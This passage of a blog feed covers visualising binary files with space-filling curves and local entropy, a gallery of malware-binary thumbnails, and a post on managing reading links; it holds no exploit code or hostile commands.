<\/a>\n<\/td>\n<td>\n    <a href=\"0309fc0e6dbeb714c5361f82b2ccb037.html\">\n        <img class=\"entropy\" src='small_0309fc0e6dbeb714c5361f82b2ccb037_entropy.png'\/>\n        <img class=\"charclass\" src='small_0309fc0e6dbeb714c5361f82b2ccb037_charclass.png'\/>\n    
<\/a>\n<\/td>\n<\/tr><tr>\n<td>\n    <a href=\"0ff25e3cefcce4336d0abeb9f02ccb02.html\">\n        <img class=\"entropy\" src='small_0ff25e3cefcce4336d0abeb9f02ccb02_entropy.png'\/>\n        <img class=\"charclass\" src='small_0ff25e3cefcce4336d0abeb9f02ccb02_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"19bc481e5cb1113c7eff49b67273f892.html\">\n        <img class=\"entropy\" src='small_19bc481e5cb1113c7eff49b67273f892_entropy.png'\/>\n        <img class=\"charclass\" src='small_19bc481e5cb1113c7eff49b67273f892_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"1a8700c754f97c115fa91fa161fa05cc.html\">\n        <img class=\"entropy\" src='small_1a8700c754f97c115fa91fa161fa05cc_entropy.png'\/>\n        <img class=\"charclass\" src='small_1a8700c754f97c115fa91fa161fa05cc_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"12e9e61357be212f28ea4c81ef75018d.html\">\n        <img class=\"entropy\" src='small_12e9e61357be212f28ea4c81ef75018d_entropy.png'\/>\n        <img class=\"charclass\" src='small_12e9e61357be212f28ea4c81ef75018d_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"01310712a180d9f939c126712d24363d.html\">\n        <img class=\"entropy\" src='small_01310712a180d9f939c126712d24363d_entropy.png'\/>\n        <img class=\"charclass\" src='small_01310712a180d9f939c126712d24363d_charclass.png'\/>\n    <\/a>\n<\/td>\n<\/tr><tr>\n<td>\n    <a href=\"1542a2f2732bbdad500bf112686503ac.html\">\n        <img class=\"entropy\" src='small_1542a2f2732bbdad500bf112686503ac_entropy.png'\/>\n        <img class=\"charclass\" src='small_1542a2f2732bbdad500bf112686503ac_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"096381c0f5ddc29319ba2b2647cea116.html\">\n        <img class=\"entropy\" src='small_096381c0f5ddc29319ba2b2647cea116_entropy.png'\/>\n        <img class=\"charclass\" src='small_096381c0f5ddc29319ba2b2647cea116_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"17fd97da6d93430ec0d9aa040b4b2c58.html\">\n        <img 
class=\"entropy\" src='small_17fd97da6d93430ec0d9aa040b4b2c58_entropy.png'\/>\n        <img class=\"charclass\" src='small_17fd97da6d93430ec0d9aa040b4b2c58_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"0d9109ab6b06f38221b713eb6a54c42f.html\">\n        <img class=\"entropy\" src='small_0d9109ab6b06f38221b713eb6a54c42f_entropy.png'\/>\n        <img class=\"charclass\" src='small_0d9109ab6b06f38221b713eb6a54c42f_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"18ce863d41622cd7aaa3c7d3d11e2f3e.html\">\n        <img class=\"entropy\" src='small_18ce863d41622cd7aaa3c7d3d11e2f3e_entropy.png'\/>\n        <img class=\"charclass\" src='small_18ce863d41622cd7aaa3c7d3d11e2f3e_charclass.png'\/>\n    <\/a>\n<\/td>\n<\/tr><tr>\n<td>\n    <a href=\"0f5c70c82a74c8ff3d05fbf4d90bc5bf.html\">\n        <img class=\"entropy\" src='small_0f5c70c82a74c8ff3d05fbf4d90bc5bf_entropy.png'\/>\n        <img class=\"charclass\" src='small_0f5c70c82a74c8ff3d05fbf4d90bc5bf_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"0fc12afe2d283b92184897b6e7bcc2c2.html\">\n        <img class=\"entropy\" src='small_0fc12afe2d283b92184897b6e7bcc2c2_entropy.png'\/>\n        <img class=\"charclass\" src='small_0fc12afe2d283b92184897b6e7bcc2c2_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"12eec9b3e0aa2e6683487c13eede2382.html\">\n        <img class=\"entropy\" src='small_12eec9b3e0aa2e6683487c13eede2382_entropy.png'\/>\n        <img class=\"charclass\" src='small_12eec9b3e0aa2e6683487c13eede2382_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"0d97f71367f8b6dcb8cbc8ec964ebdbe.html\">\n        <img class=\"entropy\" src='small_0d97f71367f8b6dcb8cbc8ec964ebdbe_entropy.png'\/>\n        <img class=\"charclass\" src='small_0d97f71367f8b6dcb8cbc8ec964ebdbe_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"18f9ede7d921742f963a0eb06887fdfa.html\">\n        <img class=\"entropy\" src='small_18f9ede7d921742f963a0eb06887fdfa_entropy.png'\/>\n        <img 
class=\"charclass\" src='small_18f9ede7d921742f963a0eb06887fdfa_charclass.png'\/>\n    <\/a>\n<\/td>\n<\/tr><tr>\n<td>\n    <a href=\"16c533cc9b3dac1bde9885b4bd967bff.html\">\n        <img class=\"entropy\" src='small_16c533cc9b3dac1bde9885b4bd967bff_entropy.png'\/>\n        <img class=\"charclass\" src='small_16c533cc9b3dac1bde9885b4bd967bff_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"0eab36fc4307a1fd3ad8d832c526cf40.html\">\n        <img class=\"entropy\" src='small_0eab36fc4307a1fd3ad8d832c526cf40_entropy.png'\/>\n        <img class=\"charclass\" src='small_0eab36fc4307a1fd3ad8d832c526cf40_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"17fa099ecef82edd1e4ddc61be575ae4.html\">\n        <img class=\"entropy\" src='small_17fa099ecef82edd1e4ddc61be575ae4_entropy.png'\/>\n        <img class=\"charclass\" src='small_17fa099ecef82edd1e4ddc61be575ae4_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"07ddb50c4cc358fc3718847684ca5fae.html\">\n        <img class=\"entropy\" src='small_07ddb50c4cc358fc3718847684ca5fae_entropy.png'\/>\n        <img class=\"charclass\" src='small_07ddb50c4cc358fc3718847684ca5fae_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"04fee7e6dedf912b4a72886486627b05.html\">\n        <img class=\"entropy\" src='small_04fee7e6dedf912b4a72886486627b05_entropy.png'\/>\n        <img class=\"charclass\" src='small_04fee7e6dedf912b4a72886486627b05_charclass.png'\/>\n    <\/a>\n<\/td>\n<\/tr>\n<\/table>\n<p>Clicking will show you high-detail versions of both visualizations, and let you\nlook up the binary hash to see what it is. I've used a square Hilbert curve\nlayout - the files start in the top-left corner, and pass through the quadrants\nclockwise.<\/p>\n<p>I spent hours looking through thousands of these visualizations today. 
I find them\neerie and rather beautiful - an entirely different perspective from my\nday-to-day interactions with malware.<\/p>\n"},{"title":"Visualizing entropy in binary files","published":"2012-01-04T00:00:00+00:00","updated":"2012-01-04T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/visualisation\/entropy\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/visualisation\/entropy\/","content":"<p><b>Edit: Since this post, I've created an interactive tool for binary\nvisualisation - see it at <a rel=\"external\" href=\"http:\/\/binvis.io\">binvis.io<\/a><\/b><\/p>\n<p>Last week, I wrote about <a href=\"https:\/\/corte.si\/posts\/visualisation\/binvis\/\">visualizing binary files using space-filling\ncurves<\/a>, a technique I use when I need to\nget a quick overview of the broad structure of a file. Today, I'll show you an\nelaboration of the same basic idea - still based on space-filling curves, but\nthis time using a colour function that measures local entropy.<\/p>\n<p>Before I get to the details, let's quickly talk about the motivation for a\nvisualization like this. We can think of entropy as the degree to which a chunk\nof data is disordered. If we have a data set where all the elements have the\nsame value, the amount of disorder is nil, and the entropy is zero. If the data\nset has the maximum amount of heterogeneity (i.e. all possible symbols are\nrepresented equally), then we also have the maximum amount of disorder, and thus\nthe maximum amount of entropy. There are two common types of high-entropy data\nthat are of special interest to reverse engineers and penetration testers. The\nfirst is compressed data - finding and extracting compressed sections is a\ncommon task in many security audits. The second is cryptographic material -\nwhich is obviously at the heart of most security work. Here, I'm referring not\nonly to key material and certificates, but also to hashes and actual encrypted\ndata. 
As I show below, a tool like the one I'm describing today can be highly\nuseful in spotting this type of information.<\/p>\n<p>For this visualization, I use the <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Entropy_(information_theory)\">Shannon\nentropy<\/a> measure to\ncalculate byte entropy over a sliding window. This gives us a \"local entropy\"\nvalue for each byte, even though the concept doesn't really apply to single\nsymbols.<\/p>\n<p>With that out of the way, let's look at some pretty pictures.<\/p>\n<h2 id=\"visualizing-the-osx-ksh-binary\">Visualizing the OSX ksh binary<\/h2>\n<p>In my previous post, I used the <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Korn_shell\">ksh<\/a>\nbinary as a guinea pig, and I'll do the same here. On the left is the entropy\nvisualization with colours ranging from black for zero entropy, through shades\nof blue as entropy increases, to hot pink for maximum entropy. On the right is\nthe Hilbert curve visualization from the last post for comparison - see <a href=\"https:\/\/corte.si\/posts\/visualisation\/binvis\/\">the\npost itself<\/a> for an explanation of the\ncolour scheme. Click for larger versions with much more detail:<\/p>\n<div class=\"media\">\n    <a href=\"hilbert-entropy-large.png\">\n        <img src=\"hilbert-entropy.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        entropy\n    <\/div>\n    \n<\/div><div class=\"media\">\n    <a href=\"..&#x2F;binvis&#x2F;binary-large-hilbert.png\">\n        <img src=\"..&#x2F;binvis&#x2F;binary-hilbert.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        byte class\n    <\/div>\n    \n<\/div>\n<p>Note that this is a dual-architecture\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Mach-O\">Mach-O<\/a> file, containing code for both\ni386 and x86_64. You can see this if you squint somewhat at these images - some\nbroad structures in the file are repeated twice. 
We can see that there are a\nnumber of different sections of the <strong>ksh<\/strong> binary that have very high entropy.\nIt's not immediately obvious why a system binary would contain either\ncompressed sections or cryptographic material. As it happens, the explanation\nin this case is quite interesting. Let's have a closer look:<\/p>\n<div class=\"media\">\n    <a href=\"entropy-annotated.png\">\n        <img src=\"entropy-annotated.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Sections <strong>1<\/strong> and <strong>2<\/strong> are a lovely validation of the central idea of this\npost. These two areas do indeed contain cryptographic material - in this case,\n<a rel=\"external\" href=\"http:\/\/developer.apple.com\/library\/mac\/#technotes\/tn2206\/_index.html\">code signing hashes and\ncertificates<\/a>.\nRather satisfyingly, they stand out like a sore thumb. It turns out that all of\nthe official OSX binaries are signed by Apple. This is then used in turn to\napply <a rel=\"external\" href=\"http:\/\/developer.apple.com\/library\/mac\/#technotes\/tn2206\/_index.html\">a variety of\npolicies<\/a>,\ndepending on who the signatory is, and whether they are trusted.<\/p>\n<p>You can dump some rudimentary data about a binary's signature using the\n<strong>codesign<\/strong> command (which you can also use to sign binaries yourself):<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>&gt; codesign -dvv \/bin\/ksh<\/span><\/span>\n<span class=\"giallo-l\"><span>Executable=\/bin\/ksh<\/span><\/span>\n<span class=\"giallo-l\"><span>Identifier=com.apple.ksh<\/span><\/span>\n<span class=\"giallo-l\"><span>Format=Mach-O universal (i386 x86_64)<\/span><\/span>\n<span class=\"giallo-l\"><span>CodeDirectory v=20100 size=5662 flags=0x0(none) hashes=278+2 location=embedded<\/span><\/span>\n<span class=\"giallo-l\"><span>Signature size=4064<\/span><\/span>\n<span 
class=\"giallo-l\"><span>Authority=Software Signing<\/span><\/span>\n<span class=\"giallo-l\"><span>Authority=Apple Code Signing Certification Authority<\/span><\/span>\n<span class=\"giallo-l\"><span>Authority=Apple Root CA<\/span><\/span>\n<span class=\"giallo-l\"><span>Info.plist=not bound<\/span><\/span>\n<span class=\"giallo-l\"><span>Sealed Resources=none<\/span><\/span>\n<span class=\"giallo-l\"><span>Internal requirements count=1 size=92<\/span><\/span><\/code><\/pre>\n<p>Section <strong>3<\/strong> (the two occurrences are the same data repeated for each\narchitecture) is interesting for a different reason - it's a cautionary example\nof how the simple entropy measure we're using sometimes detects high entropy in\nhighly structured data. A hex dump of the start of the region looks like this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>000d1f00  00 01 00 00 00 02 00 00  00 06 00 00 00 00 00 00  |................|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1f10  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1f20  00 01 02 03 04 05 06 07  08 09 0a 0b 0c 0d 0e 0f  |................|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1f30  10 11 12 13 14 15 16 17  18 19 1a 1b 1c 1d 1e 1f  |................|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1f40  20 21 22 23 24 25 26 27  28 29 2a 2b 2c 2d 2e 2f  | !&quot;#$%&amp;&#39;()*+,-.\/|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1f50  30 31 32 33 34 35 36 37  38 39 3a 3b 3c 3d 3e 3f  |0123456789:;&lt;=&gt;?|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1f60  40 41 42 43 44 45 46 47  48 49 4a 4b 4c 4d 4e 4f  |@ABCDEFGHIJKLMNO|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1f70  50 51 52 53 54 55 56 57  58 59 5a 5b 5c 5d 5e 5f  |PQRSTUVWXYZ[\\]^_|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1f80  60 
61 62 63 64 65 66 67  68 69 6a 6b 6c 6d 6e 6f  |`abcdefghijklmno|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1f90  70 71 72 73 74 75 76 77  78 79 7a 7b 7c 7d 7e 7f  |pqrstuvwxyz{|}~.|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1fa0  80 81 82 83 84 85 86 87  88 89 8a 8b 8c 8d 8e 8f  |................|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1fb0  90 91 92 93 94 95 96 97  98 99 9a 9b 9c 9d 9e 9f  |................|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1fc0  a0 a1 a2 a3 a4 a5 a6 a7  a8 a9 aa ab ac ad ae af  |................|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1fd0  b0 b1 b2 b3 b4 b5 b6 b7  b8 b9 ba bb bc bd be bf  |................|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1fe0  c0 c1 c2 c3 c4 c5 c6 c7  c8 c9 ca cb cc cd ce cf  |................|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1ff0  d0 d1 d2 d3 d4 d5 d6 d7  d8 d9 da db dc dd de df  |................|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d2000  e0 e1 e2 e3 e4 e5 e6 e7  e8 e9 ea eb ec ed ee ef  |................|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d2010  f0 f1 f2 f3 f4 f5 f6 f7  f8 f9 fa fb fc fd fe ff  |................|<\/span><\/span><\/code><\/pre>\n<p>We see that this section contains each byte value from 0x00 to 0xff in order -\nfurthermore this whole block is repeated with minor variations a number of\ntimes. There are two things to explain here - why is this detected as \"high\nentropy\" data, and what the heck is it doing in the file?<\/p>\n<p>First, we need to understand that the Shannon entropy measure looks only at the\nrelative occurrence frequencies of individual symbols (in this case, bytes). A\nchunk of data like the one above therefore looks like it has high entropy,\nbecause each symbol occurs once and only once, making the data highly\nheterogeneous.<\/p>\n<p>Now, what earthly use would chunks of data like this be? 
With a bit of digging,\nI found the answer in the <strong>ksh<\/strong> source code. These sections are maps used for\ntranslation between various <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/EBCDIC\">character<\/a>\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/ASCII\">encodings<\/a>. If you're interested, here's\nthe <a rel=\"external\" href=\"http:\/\/opensource.apple.com\/source\/ksh\/ksh-13\/ksh\/src\/lib\/libast\/string\/ccmap.c\">culprit in all its repetitive\nglory<\/a>.<\/p>\n<h2 id=\"the-code\">The code<\/h2>\n<p>As usual, the code for generating all of the images in this post is up on\nGitHub. The entropy visualizations were created with\n<a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/scurve\/blob\/master\/binvis\">binvis<\/a>, a new addition\nto <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/scurve\">scurve<\/a>, my compendium of code related\nto space-filling curves.<\/p>\n"},{"title":"A personal link mill","published":"2011-12-30T00:00:00+00:00","updated":"2011-12-30T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/socialmedia\/linkmill\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/socialmedia\/linkmill\/","content":"<p>I posted a link to an interesting visualization paper on Twitter today,\n<a rel=\"external\" href=\"https:\/\/twitter.com\/#!\/__mharrison__\/status\/152503684822081537\">prompting someone to ask me where I had found\nit<\/a>. Sadly, I\nhad to admit that I had no clue where I first saw it referenced, due to the way\nI consume links I find on the net. So, I thought I'd write a quick blog post to\nexplain myself, and then pitch a product idea that could make my life (and maybe\nyours) much easier.<\/p>\n<p>First, the problem statement: my aim is to efficiently discover links to\ninteresting stuff on the net. Simple as that. 
A few years ago, my flow of links\ncame mostly from social news sites (<a rel=\"external\" href=\"http:\/\/news.ycombinator.com\">Hacker News<\/a>\nand <a rel=\"external\" href=\"http:\/\/reddit.com\">Reddit<\/a>), and items shared by people I follow on social\nnetworks. Over time, I became more and more disenchanted with this way of doing\nthings. The social news approach is to take a torrent of very low quality links\n(user submissions), and then crowd-source the filtration process through voting.\nBut popularity is not a good measure of information quality, and the result is a\nbland, lowest-common-denominator view of the world that has no room for anything\nthat doesn't make it to the front page. Don't get me wrong - Reddit and HN do a\nlot of other things well - but they just don't cut it as primary information\nsources. Mining links from social networks is a more promising approach, but\nstill problematic. None of the social networks provide the tools needed to\nextract shared links from the update stream and consume them efficiently. There\nis also a structural issue - I don't necessarily want to mix my social ties and\nmy information sources, and I definitely don't want to be limited to just one\nplatform. These are separate functions that I feel require separate tools.<\/p>\n<h2 id=\"my-personal-link-mill\">My personal link mill<\/h2>\n<p>Eventually, I took matters into my own hands. First, I hugely broadened the\nnumber of information sources I consumed. The tool I use for this is Google\nReader - I now subscribe to about 800 individual feeds, and this number is\ngrowing daily. The trick here is to find high-quality, low-volume link sources.\nThe motherlode of good links for me was to be found on social bookmarking sites.\nAbout 700 of my subscriptions are to the RSS feeds of individual users on\n<a rel=\"external\" href=\"http:\/\/pinboard.in\">Pinboard<\/a> and <a rel=\"external\" href=\"http:\/\/delicious.com\">Delicious<\/a>. 
This gives\nme very fine control and a great mix of interests. Plus, getting links from\nindividual curators handily sidesteps the social news group-think problem. The\nremainder of my subscriptions are split between blogs, some sub-Reddits, a few\nTwitter users and subsections of <a rel=\"external\" href=\"http:\/\/arxiv.org\">arXiv<\/a>.<\/p>\n<p>So much for how my intake works. Just as important is the way that I consume\nit. I do my \"filtering\" in batches, usually in the evening. Using\n<a rel=\"external\" href=\"http:\/\/reederapp.com\/\">Reeder<\/a> on my iPad works well for me, letting me flick\nquickly and comfortably through all the new links of the day. When I find\nsomething that looks interesting, I resist the temptation to read it then and\nthere - instead, I batch up all my reading for later. If it's a web page, it\ngoes to <a rel=\"external\" href=\"http:\/\/www.instapaper.com\/\">Instapaper<\/a>.  If it's a PDF, it gets\ndownloaded into a <a rel=\"external\" href=\"http:\/\/www.dropbox.com\/\">DropBox<\/a> folder, which is synced to\n<a rel=\"external\" href=\"http:\/\/www.goodiware.com\/goodreader.html\">GoodReader<\/a>.<\/p>\n<p>Finally, the actual reading. Every morning, I toddle off to a nice cafe with my\niPad, and read all the interesting stuff I saved the previous day in a single\nsitting. I'm ruthless about just skimming things that don't warrant careful\nattention. If I find something particularly interesting I save it permanently,\nand perhaps tweet it or mail it to someone I think might be interested.<\/p>\n<h2 id=\"problems-and-a-product-idea\">Problems - and a product idea?<\/h2>\n<p>This system works for me, but it has many problems. There's no end-to-end\ncoordination, so by the time I sit down to actually read something, I have no\neasy way to tell which feed it came from. Google Reader sucks at managing\nhundreds of low-volume subscriptions. 
Reeder is great, but is not tailored to\nconsuming redundant information from many sources. The end result is that\nmaintaining the system I have is a time-consuming pain in the ass. The fact\nthat it's still worth it despite this makes me think there might be commercial\nroom for a better solution.<\/p>\n<p>Which brings me to a rough product idea - a formalized version of this link\nmill for people who want to take direct control of their information intake.\nThe business end is a generalized feed consumer, letting you subscribe to RSS\nfeeds, Twitter users, Google+ updates, sub-Reddits and other information\nsources.  Links are extracted from these feeds, keeping track of which links\nappeared where. The user is then presented with a stream of links to consume,\nde-duplicated so that those appearing in multiple feeds are presented only\nonce. The system keeps track of links the user marks as \"interesting\", batching\nthem for later consumption. It also uses this information to score the feeds,\nletting the user see which feeds are low quality, and should be ditched. Given\nthe right tools, the time needed for a user to maintain and tend their link\nfeed garden would be quite modest, and the rewards would be great.<\/p>\n<p>If someone built this, I for one would gladly fork over some of my hard-earned\ndoubloons to use it. In fact, with some validation of the idea and a few\ncollaborators I might think of building it myself. 
Does this sound useful to\nanyone else?<\/p>\n"},{"title":"Visualizing binaries with space-filling curves","published":"2011-12-23T00:00:00+00:00","updated":"2011-12-23T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/visualisation\/binvis\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/visualisation\/binvis\/","content":"<p><b>Edit: Since this post, I've created an interactive tool for binary\nvisualisation - see it at <a rel=\"external\" href=\"http:\/\/binvis.io\">binvis.io<\/a><\/b><\/p>\n<p>In my day job I often come across binary files with unknown content. I have a\nset of standard avenues of attack when I confront such a beast - use \"file\" to\nsee if it's a known file type, \"strings\" to see if there's readable text, run\nsome in-house code to extract compressed sections, and, of course, fire up a hex\neditor to take a direct look. There's something missing in that list, though - I\nhave no way to get a quick view of the overall structure of the file.  Using a\nhex editor for this is not much chop - if the first section of the file looks\nrandom (i.e. probably compressed or encrypted), who's to say that there isn't a\nchunk of non-random information a meg further down? Ideally, we want to do this\ntype of broad pattern-finding by eye, so a visualization seems to be in order.<\/p>\n<p>First, let's begin by picking a colour scheme. 
We have 256 different byte values,\nbut for a first-pass look at a file, we can compress that down into a few common\nclasses:<\/p>\n<table>\n    <tr>\n        <td style=\"background-color: #000000\">&nbsp;<\/td>\n        <td>0x00<\/td>\n    <\/tr>\n    <tr>\n        <td style=\"background-color: #ffffff\">&nbsp;<\/td>\n        <td>0xFF<\/td>\n    <\/tr>\n    <tr>\n        <td style=\"background-color: #377eb8\">&nbsp;<\/td>\n        <td>Printable characters<\/td>\n    <\/tr>\n    <tr>\n        <td style=\"background-color: #e41a1c\">&nbsp;<\/td>\n        <td>Everything else<\/td>\n    <\/tr>\n<\/table>\n<p>This covers the most common padding bytes, nicely highlights strings, and lumps\neverything else into a miscellaneous bucket. The broad outline of what we need\nto do next is clear - we sample the file at regular intervals, translate each\nsampled byte to a colour, and write the corresponding pixel to our image. This\nbrings us to the big question - what's the best way to arrange the pixels? A\nfirst stab might be to lay the pixels out row by row, snaking to and fro to make\nsure each pixel is always adjacent to its predecessor. It turns out, however,\nthat this zig-zag pattern is not very satisfying - small scale features (i.e.\nfeatures that take up only a few lines) tend to get lost.  What we want is a\nlayout that maps our one-dimensional sequence of samples onto the 2-d image,\nwhile keeping elements that are close together in one dimension as near as\npossible to each other in two dimensions.  This is called \"locality\npreservation\", and the <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Space-filling_curve\">space-filling\ncurves<\/a> are a family of\nmathematical constructs that have precisely this property. 
If you're a regular\nreader of this blog, you may know that I have an\n<a href=\"https:\/\/corte.si\/posts\/code\/hilbert\/portrait\/\">almost<\/a>\n<a href=\"https:\/\/corte.si\/posts\/code\/sortvis-fruitsalad\/\">unseemly<\/a>\n<a href=\"https:\/\/corte.si\/posts\/code\/hilbert\/swatches\/\">fondness<\/a> for these critters. So, let's\nadd a couple of space-filling curves to the mix to see how they stack up. The\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Z-order_curve\">Z-Order curve<\/a> has found wide\npractical use in computer science. It's not the best in terms of locality\npreservation, but it's easy and quick to compute. The <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Hilbert_curve\">Hilbert\ncurve<\/a>, on the other hand, is\n(nearly) as good as it gets at locality preservation, but is much more\ncomplicated to generate. Here's what our three candidate curves look like - in\neach case, the traversal starts in the top-left corner:<\/p>\n<div class=\"container\">\n    <div class=\"row\">\n        <div class=\"column\">\n            <img src=\"zigzag.png\"\/>\n            <h4>Zigzag<\/h4>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"zorder.png\"\/>\n            <h4>Z-order<\/h4>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"hilbert.png\"\/>\n            <h4>Hilbert<\/h4>\n        <\/div>\n    <\/div>\n<\/div>\n<p>And here they are, visualizing the\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Korn_shell\">ksh<\/a>\n(<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Mach-O\">Mach-O<\/a>,\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Fat_binary\">dual-architecture<\/a>) binary\ndistributed with OSX - click for the significantly more spectacular larger\nversions of the images:<\/p>\n<div class=\"container\">\n    <div class=\"row\">\n        <div class=\"column\">\n            <a href=\"binary-large-zigzag.png\"><img 
src=\"binary-zigzag.png\"\/><\/a>\n            <h4>Zigzag<\/h4>\n        <\/div>\n        <div class=\"column\">\n            <a href=\"binary-large-zorder.png\"><img src=\"binary-zorder.png\"\/><\/a>\n            <h4>Z-order<\/h4>\n        <\/div>\n        <div class=\"column\">\n            <a href=\"binary-large-hilbert.png\"><img src=\"binary-hilbert.png\"\/><\/a>\n            <h4>Hilbert<\/h4>\n        <\/div>\n    <\/div>\n<\/div>\n<p>The classical Hilbert and Z-Order curves are actually square, so for these\nvisualizations I've unrolled them, stacking four sub-curves on top of each\nother.  To my eye, the Hilbert curve is the clear winner here. Local features\nare prominent because they are nicely clumped together. The Z-order curve shows\nsome annoying artifacts with contiguous chunks of data sometimes split between\ntwo or more visual blocks.<\/p>\n<p>The downside of the space-filling curve visualizations is that we can't look at\na feature in the image and tell where, exactly, it can be found in the file.\nI'm toying with the idea (though not very seriously) of writing an interactive\nbinary file viewer with a space-filling curve navigation pane. This would let\nthe user click on or hover over a patch of structure and see the file offset\nand the corresponding hex.<\/p>\n<h2 id=\"more-detail\">More detail<\/h2>\n<p>We can get more detail in these images by increasing the granularity of the\ncolour mapping. One way to do this is to use a trick I first concocted to\n<a href=\"https:\/\/corte.si\/posts\/code\/hilbert\/portrait\/\">visualize the Hilbert Curve at\nscale<\/a>. The basic idea is to use a\n3-d Hilbert curve traversal of the RGB colour cube to create a palette of\ncolours. This makes use of the locality-preserving properties of the Hilbert\ncurve to make sure that similar elements have similar colours in the\nvisualization. 
See the <a href=\"https:\/\/corte.si\/posts\/code\/hilbert\/portrait\/\">original\npost<\/a> for more.<\/p>\n<p>So, here's a Hilbert curve mapping of a binary file, using a Hilbert-order\ntraversal of the RGB cube as a colour palette. Again, click on the image for\nthe much nicer large scale version:<\/p>\n<div class=\"media\">\n    <a href=\"hilbert-hilbert-large.png\">\n        <img src=\"hilbert-hilbert.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>This shows significantly more fine-grained structure, which might be good for a\ndeep dive into a binary. On the other hand, the colours don't map cleanly to\ndistinct byte classes, so the image is harder to interpret. An ideal hex viewer\nwould let you flick between the two palettes for navigation.<\/p>\n<h2 id=\"the-code\">The code<\/h2>\n<p>As usual, I'm publishing the code for generating all of the images in this\npost. The binary visualizations were created with\n<a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/scurve\/blob\/master\/binvis\">binvis<\/a>, which is a new\naddition to <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/scurve\">scurve<\/a>, my space-filling curve\nproject. The curve diagrams were made with the \"drawcurve\" utility to be found\nin the same place.<\/p>\n"},{"title":"netograph.com - Realtime privacy snapshots of the social web","published":"2011-12-08T00:00:00+00:00","updated":"2011-12-08T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/netograph\/launch\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/netograph\/launch\/","content":"<p>Today, I'm launching <a rel=\"external\" href=\"http:\/\/netograph.com\">Netograph<\/a>, a new privacy-related\nsite that I've been hacking on over the past few months. The goal of the project\nis to provide you with a quick overview of the privacy picture for a URL,\n<strong>before<\/strong> you've clicked on the link. 
